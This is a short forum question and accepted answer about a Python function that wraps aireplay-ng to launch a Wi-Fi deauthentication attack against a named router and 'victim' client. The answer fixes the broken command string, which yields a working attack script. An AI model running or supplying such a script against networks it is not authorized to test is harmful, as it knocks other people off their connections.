# Invalid BSSID (AP MAC address)

Tags: python, linux, networking, command-line

write this command in the terminal when the attack begins, but when I write the same command in the script it will be a mistake.

Invalid BSSID (AP MAC address).

"aireplay-ng --help" for help.

```
 def deauth(mac_roteur,mac_victime,essid):
 os.system('sudo aireplay-ng -0 0 -b'+ mac_roteur+'-c'+ mac_victime + '-e'+ essid +'--ignore-negative-one mon0')
```

I need help. thanks.

Answer (score 0, accepted):

If you want to run commands you should use the [subprocess](https://docs.python.org/2/library/subprocess.html) module:

```
from subprocess import check_call
def deauth(mac_roteur,mac_victime,essid):
    check_call(['sudo', 'aireplay-ng','-0', '0', '-b', mac_roteur, '-c',  mac_victime, '-e',  essid, '--ignore-negative-one','mon0'])
```

I presume you are running the script with sudo.